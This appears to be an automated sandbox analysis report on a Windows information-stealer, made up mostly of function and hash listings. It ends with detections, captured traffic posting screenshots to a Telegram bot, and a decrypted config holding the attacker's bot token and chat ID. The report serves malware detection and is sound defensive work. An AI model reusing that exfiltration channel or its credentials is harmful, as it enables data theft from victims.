Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9B831F16

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 4abbe4a8c704923cb9df3f38a920ccd92bd00c26ea3e2a511e17959bc0daec8f
Instruction ID: 880db0a5ee5825a87267a7ba39c7050cefaece6abf2d4ed93e795fffca0f5d3e
Opcode Fuzzy Hash: 4abbe4a8c704923cb9df3f38a920ccd92bd00c26ea3e2a511e17959bc0daec8f
Instruction Fuzzy Hash: 98E0C23060A6854FCF19EA388058811FF90EF6720174446EDC06BCB156DE29C885CB40

Function 00007FFD9B8383CC Relevance: 1.3, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9B8383D6

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: f61d7f7969e589ae5d278f4cdc7ec0a0ee1361f6d4e295ef25c91a615ad4b408
Instruction ID: 528f69f178c231c025b49555e0ba94c0ba8c465ee51aa2f8995152460c639326
Opcode Fuzzy Hash: f61d7f7969e589ae5d278f4cdc7ec0a0ee1361f6d4e295ef25c91a615ad4b408
Instruction Fuzzy Hash: 3BD0A77154B5844FCF18FF788469C157F90EF6B30078A40ECC04ACB2B6E629D945C700

Function 00007FFD9B810CF0 Relevance: .9, Instructions: 948
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b810000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 073625f360afb1961463d7e1fcd987688676e24397fb528f0d0363d9f5c78d08
Instruction ID: 2a77eecc871b49ff35abebc8f9b3c6d240aaa5a214c7e21837451069e6cc4f43
Opcode Fuzzy Hash: 073625f360afb1961463d7e1fcd987688676e24397fb528f0d0363d9f5c78d08
Instruction Fuzzy Hash: B862C921F1E95E4FEBA9EB6888A56B973D2FF98340F0505B9D04DC32E6DD287D818740

Function 00007FFD9B83360C Relevance: .3, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7fee5da4a7cec23995696cc7147e329f5fb037faaaf35e01b57c86668d99c3f
Instruction ID: 8454302f8d9c74445778dfc4dbd09ea1f16baa28c18d6e71a143372cd86ed596
Opcode Fuzzy Hash: d7fee5da4a7cec23995696cc7147e329f5fb037faaaf35e01b57c86668d99c3f
Instruction Fuzzy Hash: 6091D561B1DA8E4FEBA8EF6884766B972D2EF98340F0541B9D40DC33D7DD28B9854381

Function 00007FFD9B811305 Relevance: .3, Instructions: 276
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b810000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed33861cf8181b3834f6f093281eb52ec3b8512daa35fac33c3a833efde23589
Instruction ID: 7d759abd2f52bb7bff39763d932add927713aac84810737ef6d9d685d55fbdb0
Opcode Fuzzy Hash: ed33861cf8181b3834f6f093281eb52ec3b8512daa35fac33c3a833efde23589
Instruction Fuzzy Hash: 40919671F1E94E4FE768EB6894A16B873A2FF98340B0505BDD05EC32D7DD38A9828741

Function 00007FFD9B83B198 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4de33a083e0c3ed0b3727f3fe696ff32b65b88d5bcae1c3886b82aef03c722e
Instruction ID: eea1b10eff322eb3301697203932685008847429b8cdd8d84282b599b6c2e692
Opcode Fuzzy Hash: f4de33a083e0c3ed0b3727f3fe696ff32b65b88d5bcae1c3886b82aef03c722e
Instruction Fuzzy Hash: E1411BB1B09E5E4FE7A4EB6884A96AC76D5FF5C340F0501BAE00DC33E6DD2479814741

Function 00007FFD9B8325B8 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6732fce4339af530065a041576c3240a95663deeec292000596ba0e7eb1f261
Instruction ID: 1fda7af055bcfe3d7a8b8be6c2bd6519ba9eb15619fc27004a48ceeb89607631
Opcode Fuzzy Hash: a6732fce4339af530065a041576c3240a95663deeec292000596ba0e7eb1f261
Instruction Fuzzy Hash: 5C41C632A09A594FE768EF98C8647A977A1EF98350F05027AD44DC73D2DE286D84CB81

Function 00007FFD9B8155BD Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b810000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf9d6b434464b9eed21085ec98ac4948e49e91d9728334ce292ea06216d5f7dc
Instruction ID: b35177140b4b22c711425df2e7f48665f529ab9f3dc472d25a77ed89a420a31f
Opcode Fuzzy Hash: cf9d6b434464b9eed21085ec98ac4948e49e91d9728334ce292ea06216d5f7dc
Instruction Fuzzy Hash: 55014E17F1A6560AD718B76CD4790F87790EFC612978941B3C04DCD1D3DC05988A8280

Function 00007FFD9B83B990 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cebf44fa8f5237e15ad3577d888aefa3936e13cedb35c9e7dc3c7ac9de524256
Instruction ID: c122a8bf6089cbfb9bf6fdc5a885153ec2ddbc5348fb83ae1b4cdff0539216ec
Opcode Fuzzy Hash: cebf44fa8f5237e15ad3577d888aefa3936e13cedb35c9e7dc3c7ac9de524256
Instruction Fuzzy Hash: 5101D63AB4A5950BD719EB6CD8BA8E43BA0EF4623D74D40F6D099CF2B3ED1894468341

Function 00007FFD9B83D9D8 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f21b2b804f35181fa7fd7174d010508c00715bbc2d93b1800b4dde3daf35ac22
Instruction ID: 918788dc52f9740ef10a4d1025e5488b40669e53fd5ce696392d817fa16ca925
Opcode Fuzzy Hash: f21b2b804f35181fa7fd7174d010508c00715bbc2d93b1800b4dde3daf35ac22
Instruction Fuzzy Hash: 9E018431B1950E8BEB68DB689865BFDB3E1FF48300F450534D019D32E1DE68AA80C780

Function 00007FFD9B837B5D Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f17222b60e8dc3990b66d8df443ea9202cfab0d277a08ae8ea8ed3cc350fd45
Instruction ID: 907a9cb838799d00da2a4bc573af4ae5262ba2f002f494e440a87099fab2f312
Opcode Fuzzy Hash: 7f17222b60e8dc3990b66d8df443ea9202cfab0d277a08ae8ea8ed3cc350fd45
Instruction Fuzzy Hash: 7D018B25A0E7C65FD31B177888358647F70EF6B21070A00E7C094CB1F3E91DA94AC352

Function 00007FFD9B8144D9 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b810000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57cd730fe0392ecf9fa734349d319e8cd8de832bb4ece0962133d0894021d01a
Instruction ID: 37210bc938cc870f7c8124037ce45a7e9f91cd58ea3048bc4849ce86a947c767
Opcode Fuzzy Hash: 57cd730fe0392ecf9fa734349d319e8cd8de832bb4ece0962133d0894021d01a
Instruction Fuzzy Hash: 60018070E0940B8BEB64DB94C860AAD77E1EB55310F15053AD415972D8DF786A828B80

Function 00007FFD9B83AB89 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc8588e88352f0834db31ab3a8fae4cf599344ce1c60f3841d5f03529cac6cb7
Instruction ID: a9451a110d1a5338d8ec76f81237f7b1d512da8f8f01712639453c1ceb6e8436
Opcode Fuzzy Hash: fc8588e88352f0834db31ab3a8fae4cf599344ce1c60f3841d5f03529cac6cb7
Instruction Fuzzy Hash: 58F02021B0DBC80FC72A962D48A50207FE1DB5B11230A02FFC086CB2A3ED59EC868341

Function 00007FFD9B814C20 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b810000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e7b14d706b0bb96c290e7903d6db0490709abddbd41da37acc68952f82bbc0
Instruction ID: a2d047aa9abd5aff2e4d595c2e934d2601c93db29b75e867032d736fdebfbff5
Opcode Fuzzy Hash: c3e7b14d706b0bb96c290e7903d6db0490709abddbd41da37acc68952f82bbc0
Instruction Fuzzy Hash: F6F0A730B0F50F4BE7289B4894506B53251FF59311B175179D45EC21D6DE38E9514B84

Function 00007FFD9B83DB99 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d40cd120e489d3a3253ea2eee95decda6470d4cf850938e6d1973c2b07f93ef6
Instruction ID: 32ee2e794a44926d654776f26225b49b4baf2aa82704996f45b114d06d76148c
Opcode Fuzzy Hash: d40cd120e489d3a3253ea2eee95decda6470d4cf850938e6d1973c2b07f93ef6
Instruction Fuzzy Hash: 8AE01A2294F7D04FC70B9B3588698843F70AE5B22174A41EBC085CF6B3DA19984AC711

Function 00007FFD9B8199FA Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b810000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac26f9787a8439bfe303440a68a75e1ada8ad573aeae4a4d75d4735de5551504
Instruction ID: 0d8474bd4bec9dd5e42c5ef158d0759250b194cecab73941a62b37e8cd8da803
Opcode Fuzzy Hash: ac26f9787a8439bfe303440a68a75e1ada8ad573aeae4a4d75d4735de5551504
Instruction Fuzzy Hash: 03F03031E0951D8FEB64EB44C891BE973A2EB18311F5242B6D80DD72E5DE38AE418B81

Function 00007FFD9B83DB19 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed758c37ee6e0c7fe5f0e626626df21d6cf7b67cc9a3baf1c1276b0da650e358
Instruction ID: 3d292e9a0f2be33a2372fc5f15425f057b69f07f2d671733ce5fbddafaff1322
Opcode Fuzzy Hash: ed758c37ee6e0c7fe5f0e626626df21d6cf7b67cc9a3baf1c1276b0da650e358
Instruction Fuzzy Hash: 67E01A2294F7C04FC70B9B3588688453F70AE1B21178A41EFC085CF6F3DA1A994AC701

Function 00007FFD9B815658 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b810000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e3852c7be42877991b74dc0ef8482ab11ca37e0199196fea86171960c8f4743
Instruction ID: d80293b1f81917e51491cc86f7038aeb010c55f620a4e81d006469b61620007b
Opcode Fuzzy Hash: 7e3852c7be42877991b74dc0ef8482ab11ca37e0199196fea86171960c8f4743
Instruction Fuzzy Hash: 75D05E34B6090D4B8B1CA62D8468470B3D1E7AE2067D45278940BC2295EE25ECC68B80

Function 00007FFD9B83A730 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9B83A660 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9B813F20 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b810000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80

Function 00007FFD9B831FA0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD9B837B39 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8c47eaa5d2a791ebca7e6acb10c855300d803283f06e9f08275066308910800
Instruction ID: cc3003a99191af6b9e7a06e5f91a20396cda73062f9d28a9b2a8bb11a264b069
Opcode Fuzzy Hash: f8c47eaa5d2a791ebca7e6acb10c855300d803283f06e9f08275066308910800
Instruction Fuzzy Hash: 7FD0A73594B5848FCF0E9B35C4ACC507F60EF1A20134545EDC04A8F2B3ED29D989CB01

Function 00007FFD9B83B9E0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11f0e614b61dd8402b1f6cef3bf42be3e8dbf3004db8f484bdd3684dcb90d91b
Instruction ID: 9a871ff8b136889c158e8afc5c6450e40da0559133434145a6fa2a3926f9da5a
Opcode Fuzzy Hash: 11f0e614b61dd8402b1f6cef3bf42be3e8dbf3004db8f484bdd3684dcb90d91b
Instruction Fuzzy Hash: C7D01235B619044FCB1CBB3888698747391EB6E21679540A9D00AC73B1D96ADD99C741

Function 00007FFD9B8370C0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B831000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b831000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31d8b962ad8697e016be0419b8b3746812643610956d0d679795cb27cfcbcbb5
Instruction ID: aee4f1a199770b8e52cfe3dcab895a1544867094cedec70711940d78d0a3e616
Opcode Fuzzy Hash: 31d8b962ad8697e016be0419b8b3746812643610956d0d679795cb27cfcbcbb5
Instruction Fuzzy Hash: EAD01234B519084FC71CA7388869C7473A1EB6E21679550A9D00ACB3B1E96ADD89C741

Non-executed Functions

Function 00007FFD9B810622 Relevance: 9.0, Strings: 7, Instructions: 300COMMON

Download Yara Rule

Strings

K_^:, xrefs: 00007FFD9B810772
K_^$, xrefs: 00007FFD9B8106C2
^+=, xrefs: 00007FFD9B81078E
K_^1, xrefs: 00007FFD9B81072A
K_^9, xrefs: 00007FFD9B81076A
#<K, xrefs: 00007FFD9B810897
K_^%, xrefs: 00007FFD9B8106C9

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b810000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID: K_^$$K_^%$K_^1$K_^9$K_^:$^+=$#<K
API String ID: 0-1709254129
Opcode ID: 7109adf5e5455b1e7812a980ac01664e60d62356f358db5c7f9a2dcea8ace12b
Instruction ID: e1c0bb66d372b14644d75ec4b22317a03bb6dec40282c58299b97290aefe9de3
Opcode Fuzzy Hash: 7109adf5e5455b1e7812a980ac01664e60d62356f358db5c7f9a2dcea8ace12b
Instruction Fuzzy Hash: 1371D92BF0D56608E718B7AD79A98FD6720DFC133E726C7B7D1AE890C78C18648241D5

Function 00007FFD9B8106D3 Relevance: 9.0, Strings: 7, Instructions: 226COMMON

Download Yara Rule

Strings

K_^:, xrefs: 00007FFD9B810772
K_^$, xrefs: 00007FFD9B8106C2
^+=, xrefs: 00007FFD9B81078E
K_^1, xrefs: 00007FFD9B81072A
K_^9, xrefs: 00007FFD9B81076A
#<K, xrefs: 00007FFD9B810897
K_^%, xrefs: 00007FFD9B8106C9

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b810000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID: K_^$$K_^%$K_^1$K_^9$K_^:$^+=$#<K
API String ID: 0-1709254129
Opcode ID: 826cad02e9df8558e1c57dd88811ffa8deb86860069927c8c8d2ac5b2457a08f
Instruction ID: 144c2f5c155021c672c12d7741d2b9ec4ccaf4158e2c86dcc6610f94135fa083
Opcode Fuzzy Hash: 826cad02e9df8558e1c57dd88811ffa8deb86860069927c8c8d2ac5b2457a08f
Instruction Fuzzy Hash: E651951BF0D5A604E719B7A8796A8FD2724DFC133EB26C7B3E12E880CB4C1C658241D9

Function 00007FFD9B8106FA Relevance: 9.0, Strings: 7, Instructions: 216COMMON

Download Yara Rule

Strings

K_^:, xrefs: 00007FFD9B810772
^+=, xrefs: 00007FFD9B81078E
K_^+, xrefs: 00007FFD9B8106FA
=K_^, xrefs: 00007FFD9B810701
K_^1, xrefs: 00007FFD9B81072A
K_^9, xrefs: 00007FFD9B81076A
#<K, xrefs: 00007FFD9B810897

Memory Dump Source

Source File: 0000001D.00000002.1890592488.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9b810000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID: =K_^$K_^+$K_^1$K_^9$K_^:$^+=$#<K
API String ID: 0-3531221116
Opcode ID: d5c2da711024687b5f9eb676bd247d51d150476eabc9bb37cfe23bbcae2ac0b8
Instruction ID: 93305281efccf561a96ca4d4d18f0bbe2a05545a1a3b97df6fa1a26eb54e5c11
Opcode Fuzzy Hash: d5c2da711024687b5f9eb676bd247d51d150476eabc9bb37cfe23bbcae2ac0b8
Instruction Fuzzy Hash: E151651BE0C5A604E718B6ED3A5A8FD6724DFC137EB26C7B3E12E880CB4D1C648241D5

Source: C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\GxFitJjJ.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\QgYydmoq.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Windows\CbsTemp\System.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Source: C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe	ReversingLabs: Detection: 75%
Source: C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe	ReversingLabs: Detection: 75%
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\Desktop\GxFitJjJ.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\QgYydmoq.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\pZhlLBKs.log	ReversingLabs: Detection: 25%
Source: C:\Windows\CbsTemp\System.exe	ReversingLabs: Detection: 75%

Source: C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\QgYydmoq.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\NvtiWYey.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe	Joe Sandbox ML: detected
Source: C:\Windows\CbsTemp\System.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\OsUqsYts.log	Joe Sandbox ML: detected

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic	HTTP traffic detected: POST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="0d1016a9-b6d2-4447-b2c3-ce9150ecfb94"Host: api.telegram.orgContent-Length: 87332Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io

Source: 00000000.00000002.1741585863.0000000012D90000.00000004.00000800.00020000.00000000.sdmp	String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"TelegramNotifer":{"chatid":"6283373442","bottoken":"8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg","settings":"new user connect !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"True","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"}}
